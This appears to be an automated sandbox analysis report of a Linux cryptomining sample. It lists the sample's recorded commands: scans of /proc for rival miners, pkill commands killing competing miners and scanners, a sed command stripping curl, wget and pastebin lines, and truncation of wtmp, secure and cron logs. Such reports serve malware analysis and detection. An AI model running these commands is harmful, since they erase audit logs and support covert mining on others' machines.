Source: /usr/bin/bash (PID: 6527) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6529) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6530) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6533) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/118/exe
Source: /usr/bin/bash (PID: 6535) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6537) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6538) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6539) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/119/exe
Source: /usr/bin/bash (PID: 6541) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6543) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6544) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6545) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/12/exe
Source: /usr/bin/bash (PID: 6547) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6549) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6550) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6551) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/120/exe
Source: /usr/bin/bash (PID: 6553) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6555) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6556) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6557) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1207/exe
Source: /usr/bin/bash (PID: 6559) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6561) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6562) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6563) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/121/exe
Source: /usr/bin/bash (PID: 6565) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6567) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6568) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6569) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/122/exe
Source: /usr/bin/bash (PID: 6571) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6573) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6574) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6575) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/123/exe
Source: /usr/bin/bash (PID: 6577) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6579) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6580) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6581) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/124/exe
Source: /usr/bin/bash (PID: 6583) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6585) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6586) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6587) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/125/exe
Source: /usr/bin/bash (PID: 6589) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6593) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6594) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6595) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/126/exe
Source: /usr/bin/bash (PID: 6597) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6599) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6600) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6601) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/127/exe
Source: /usr/bin/bash (PID: 6603) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6605) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6606) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6607) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/128/exe
Source: /usr/bin/bash (PID: 6609) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6611) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6612) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6613) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/13/exe
Source: /usr/bin/bash (PID: 6615) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6617) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6618) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6619) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/130/exe
Source: /usr/bin/bash (PID: 6621) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6623) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6624) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6625) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/132/exe
Source: /usr/bin/bash (PID: 6627) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6629) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6630) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6631) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1320/exe
Source: /usr/bin/bash (PID: 6633) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6635) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6636) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6637) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1334/exe
Source: /usr/bin/bash (PID: 6639) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6641) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6642) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6643) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1335/exe
Source: /usr/bin/bash (PID: 6645) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6649) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6650) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6651) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1344/exe
Source: /usr/bin/bash (PID: 6653) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6655) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6656) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6657) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1349/exe
Source: /usr/bin/bash (PID: 6659) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6661) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6662) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6663) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1389/exe
Source: /usr/bin/bash (PID: 6665) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6667) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6668) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6669) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/14/exe
Source: /usr/bin/bash (PID: 6671) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6673) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6674) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6675) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/141/exe
Source: /usr/bin/bash (PID: 6677) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6679) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6680) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6681) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/144/exe
Source: /usr/bin/bash (PID: 6683) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6685) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6686) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6687) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1463/exe
Source: /usr/bin/bash (PID: 6689) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6691) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6692) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6693) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1465/exe
Source: /usr/bin/bash (PID: 6695) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6697) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6698) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6699) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1475/exe
Source: /usr/bin/bash (PID: 6701) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6705) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6706) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6707) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1476/exe
Source: /usr/bin/bash (PID: 6709) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6711) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6712) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6713) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1477/exe
Source: /usr/bin/bash (PID: 6715) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6717) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6718) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6719) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1489/exe
Source: /usr/bin/bash (PID: 6721) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6723) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6724) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6725) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1494/exe
Source: /usr/bin/bash (PID: 6727) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6729) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6730) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6731) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/15/exe
Source: /usr/bin/bash (PID: 6733) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6735) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6736) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6737) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1532/exe
Source: /usr/bin/bash (PID: 6739) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6741) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6742) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6743) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/157/exe
Source: /usr/bin/bash (PID: 6745) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6747) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6748) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6749) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1576/exe
Source: /usr/bin/bash (PID: 6751) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6753) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6754) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6755) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1579/exe
Source: /usr/bin/bash (PID: 6757) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6759) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6760) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6761) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1582/exe
Source: /usr/bin/bash (PID: 6765) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6767) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6768) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6769) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1586/exe
Source: /usr/bin/bash (PID: 6771) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6773) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6774) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6775) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1594/exe
Source: /usr/bin/bash (PID: 6777) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6779) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6780) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6781) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1599/exe
Source: /usr/bin/bash (PID: 6783) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6785) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6786) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6787) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/16/exe
Source: /usr/bin/bash (PID: 6789) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6791) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6792) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6793) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1601/exe
Source: /usr/bin/bash (PID: 6795) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6797) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6798) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6799) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1612/exe
Source: /usr/bin/bash (PID: 6801) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6803) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6804) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6805) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1622/exe
Source: /usr/bin/bash (PID: 6807) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6809) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6810) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6811) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1623/exe
Source: /usr/bin/bash (PID: 6813) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6815) Grep executable: /usr/bin/grep -> grep exe
Source: /usr/bin/bash (PID: 6816) Grep executable: /usr/bin/grep -> grep ninja\\|bin/perl\\|/dev/shm\\|firewall\\|3AvA
Source: /usr/bin/bash (PID: 6817) Grep executable: /usr/bin/grep -> grep -a donate-level /proc/1627/exe
Source: /usr/bin/bash (PID: 6819) Grep executable: /usr/bin/grep -> grep -w kthreaddk
Source: /usr/bin/bash (PID: 6238) Pkill executable: /usr/bin/pkill -> pkill -9 -f b64decode Jump to behavior
Source: /usr/bin/bash (PID: 6239) Pkill executable: /usr/bin/pkill -> pkill -9 -f MCf8 Jump to behavior
Source: /usr/bin/bash (PID: 6242) Pkill executable: /usr/bin/pkill -> pkill -9 -f mysqldd Jump to behavior
Source: /usr/bin/bash (PID: 6243) Pkill executable: /usr/bin/pkill -> pkill -9 -f monero Jump to behavior
Source: /usr/bin/bash (PID: 6244) Pkill executable: /usr/bin/pkill -> pkill -9 -f kinsing Jump to behavior
Source: /usr/bin/bash (PID: 6247) Pkill executable: /usr/bin/pkill -> pkill -9 -f sshpass Jump to behavior
Source: /usr/bin/bash (PID: 6248) Pkill executable: /usr/bin/pkill -> pkill -9 -f sshexec Jump to behavior
Source: /usr/bin/bash (PID: 6251) Pkill executable: /usr/bin/pkill -> pkill -9 -f cnrig Jump to behavior
Source: /usr/bin/bash (PID: 6253) Pkill executable: /usr/bin/pkill -> pkill -9 -f attack Jump to behavior
Source: /usr/bin/bash (PID: 6254) Pkill executable: /usr/bin/pkill -> pkill -9 -f dovecat Jump to behavior
Source: /usr/bin/bash (PID: 6276) Pkill executable: /usr/bin/pkill -> pkill -9 -f javae Jump to behavior
Source: /usr/bin/bash (PID: 6277) Pkill executable: /usr/bin/pkill -> pkill -9 -f donate Jump to behavior
Source: /usr/bin/bash (PID: 6278) Pkill executable: /usr/bin/pkill -> pkill -9 -f scan\\.log Jump to behavior
Source: /usr/bin/bash (PID: 6281) Pkill executable: /usr/bin/pkill -> pkill -9 -f xmr-stak Jump to behavior
Source: /usr/bin/bash (PID: 6282) Pkill executable: /usr/bin/pkill -> pkill -9 -f crond64 Jump to behavior
Source: /usr/bin/bash (PID: 6283) Pkill executable: /usr/bin/pkill -> pkill -9 -f stratum
Source: /usr/bin/bash (PID: 6286) Pkill executable: /usr/bin/pkill -> pkill -9 -f /tmp/java
Source: /usr/bin/bash (PID: 6287) Pkill executable: /usr/bin/pkill -> pkill -9 -f pastebin
Source: /usr/bin/bash (PID: 6288) Pkill executable: /usr/bin/pkill -> pkill -9 -f /tmp/\\.
Source: /usr/bin/bash (PID: 6291) Pkill executable: /usr/bin/pkill -> pkill -9 -f so\\.txt
Source: /usr/bin/bash (PID: 6292) Pkill executable: /usr/bin/pkill -> pkill -9 -f "bash -s 3673"
Source: /usr/bin/bash (PID: 6295) Pkill executable: /usr/bin/pkill -> pkill -9 -f 8005/cc5
Source: /usr/bin/bash (PID: 6296) Pkill executable: /usr/bin/pkill -> pkill -9 -f /tmp/system
Source: /usr/bin/bash (PID: 6297) Pkill executable: /usr/bin/pkill -> pkill -9 -f \\./cliented
Source: /usr/bin/bash (PID: 6298) Pkill executable: /usr/bin/pkill -> pkill -9 -f \\.inis
Source: /usr/bin/bash (PID: 6301) Pkill executable: /usr/bin/pkill -> pkill -9 -f certutil
Source: /usr/bin/bash (PID: 6303) Pkill executable: /usr/bin/pkill -> pkill -9 -f excludefile
Source: /usr/bin/bash (PID: 6306) Pkill executable: /usr/bin/pkill -> pkill -9 -f agettyd
Source: /usr/bin/bash (PID: 6309) Pkill executable: /usr/bin/pkill -> pkill -9 -f kthreaddkk
Source: /usr/bin/bash (PID: 6310) Pkill executable: /usr/bin/pkill -> pkill -9 -f /dev/shm
Source: /usr/bin/bash (PID: 6311) Pkill executable: /usr/bin/pkill -> pkill -9 -f /var/tmp
Source: /usr/bin/bash (PID: 6314) Pkill executable: /usr/bin/pkill -> pkill -9 -f \\./python
Source: /usr/bin/bash (PID: 6315) Pkill executable: /usr/bin/pkill -> pkill -9 -f \\./crun
Source: /usr/bin/bash (PID: 6318) Pkill executable: /usr/bin/pkill -> pkill -9 -f "bash -s kthreaddk"
Source: /usr/bin/bash (PID: 6319) Pkill executable: /usr/bin/pkill -> pkill -9 -f \\./\\.
Source: /usr/bin/bash (PID: 6320) Pkill executable: /usr/bin/pkill -> pkill -9 -f 118/cf\\.sh
Source: /usr/bin/bash (PID: 6323) Pkill executable: /usr/bin/pkill -> pkill -9 -f \\./lin64
Source: /usr/bin/bash (PID: 6324) Pkill executable: /usr/bin/pkill -> pkill -9 -f confluence/install\\.sh
Source: /usr/bin/bash (PID: 6325) Pkill executable: /usr/bin/pkill -> pkill -9 -f unls64\\.sh
Source: /usr/bin/bash (PID: 6328) Pkill executable: /usr/bin/pkill -> pkill -9 -f \\./system-xfwm4-session
Source: /usr/bin/bash (PID: 6329) Pkill executable: /usr/bin/pkill -> pkill -9 -f \\./httpd
Source: /usr/bin/bash (PID: 6330) Pkill executable: /usr/bin/pkill -> pkill -9 -f xmrig
Source: /usr/bin/bash (PID: 6333) Pkill executable: /usr/bin/pkill -> pkill -9 -f kthreaddi
Source: /usr/bin/bash (PID: 6334) Pkill executable: /usr/bin/pkill -> pkill -9 -f loligang
Source: /usr/bin/bash (PID: 6336) Pkill executable: /usr/bin/pkill -> pkill -9 -f kthreaddw
Source: /usr/bin/bash (PID: 6339) Pkill executable: /usr/bin/pkill -> pkill -9 -f chmod
Source: /usr/bin/bash (PID: 6340) Pkill executable: /usr/bin/pkill -> pkill -9 \\.6379
Source: /usr/bin/bash (PID: 6341) Pkill executable: /usr/bin/pkill -> pkill -9 load\\.sh
Source: /usr/bin/bash (PID: 6344) Pkill executable: /usr/bin/pkill -> pkill -9 init\\.sh
Source: /usr/bin/bash (PID: 6345) Pkill executable: /usr/bin/pkill -> pkill -9 solr\\.sh
Source: /usr/bin/bash (PID: 6348) Pkill executable: /usr/bin/pkill -> pkill -9 \\.rsyslogds
Source: /usr/bin/bash (PID: 6349) Pkill executable: /usr/bin/pkill -> pkill -9 sysDworker
Source: /usr/bin/bash (PID: 6352) Pkill executable: /usr/bin/pkill -> pkill -9 pnscan
Source: /usr/bin/bash (PID: 6353) Pkill executable: /usr/bin/pkill -> pkill -9 masscan
Source: /usr/bin/bash (PID: 6355) Pkill executable: /usr/bin/pkill -> pkill -9 juiceSSH
Source: /usr/bin/bash (PID: 6358) Pkill executable: /usr/bin/pkill -> pkill -9 sysguard
Source: /usr/bin/bash (PID: 6359) Pkill executable: /usr/bin/pkill -> pkill -9 kdevtmpfsi
Source: /usr/bin/bash (PID: 6360) Pkill executable: /usr/bin/pkill -> pkill -9 solrd
Source: /usr/bin/bash (PID: 6363) Pkill executable: /usr/bin/pkill -> pkill -9 polska
Source: /usr/bin/bash (PID: 6365) Pkill executable: /usr/bin/pkill -> pkill -9 meminitsrv
Source: /usr/bin/bash (PID: 6370) Pkill executable: /usr/bin/pkill -> pkill -9 networkservice
Source: /usr/bin/bash (PID: 6371) Pkill executable: /usr/bin/pkill -> pkill -9 sysupdate
Source: /usr/bin/bash (PID: 6372) Pkill executable: /usr/bin/pkill -> pkill -9 phpguard
Source: /usr/bin/bash (PID: 6373) Pkill executable: /usr/bin/pkill -> pkill -9 phpupdate
Source: /usr/bin/bash (PID: 6376) Pkill executable: /usr/bin/pkill -> pkill -9 networkmanager
Source: /usr/bin/bash (PID: 6377) Pkill executable: /usr/bin/pkill -> pkill -9 knthread
Source: /usr/bin/bash (PID: 6378) Pkill executable: /usr/bin/pkill -> pkill -9 mysqlserver
Source: /usr/bin/bash (PID: 6381) Pkill executable: /usr/bin/pkill -> pkill -9 gitlabkill
Source: /usr/bin/bash (PID: 6382) Pkill executable: /usr/bin/pkill -> pkill -9 watchbog
Source: /usr/bin/bash (PID: 6383) Pkill executable: /usr/bin/pkill -> pkill -9 bashirc
Source: /usr/bin/bash (PID: 6386) Pkill executable: /usr/bin/pkill -> pkill -9 zgrab
Source: /usr/bin/bash (PID: 6223) Awk executable: /usr/bin/awk -> awk -v n=1713934349 "{print substr($1,1,n%7+6)}" Jump to behavior
Source: /usr/bin/bash (PID: 6233) Awk executable: /usr/bin/awk -> awk "{print $2}" Jump to behavior
Source: /usr/bin/bash (PID: 6230) Sed executable: /usr/bin/sed -> sed /\\.bashgo\\|pastebin\\|onion\\|bprofr\\|python\\|curl\\|wget\\|\\.sh/d Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknown Network traffic detected: HTTP traffic on port 57658 -> 9991
Source: unknown Network traffic detected: HTTP traffic on port 9991 -> 57658
Source: unknown Network traffic detected: HTTP traffic on port 57660 -> 9991
Source: unknown Network traffic detected: HTTP traffic on port 9991 -> 57660

Malware Analysis System Evasion

barindex
Source: /usr/bin/bash (PID: 6216) Truncated file: /var/log/wtmp Jump to behavior
Source: /usr/bin/bash (PID: 6216) Truncated file: /var/log/secure Jump to behavior
Source: /usr/bin/bash (PID: 6216) Truncated file: /var/log/cron Jump to behavior
Source: /usr/bin/bash (PID: 6216) Truncated file: /var/log/wtmp Jump to behavior
Source: /usr/bin/bash (PID: 6216) Truncated file: /var/log/secure Jump to behavior
Source: /usr/bin/bash (PID: 6216) Truncated file: /var/log/cron Jump to behavior
Source: /usr/bin/pkill (PID: 6238) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6239) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6242) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6243) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
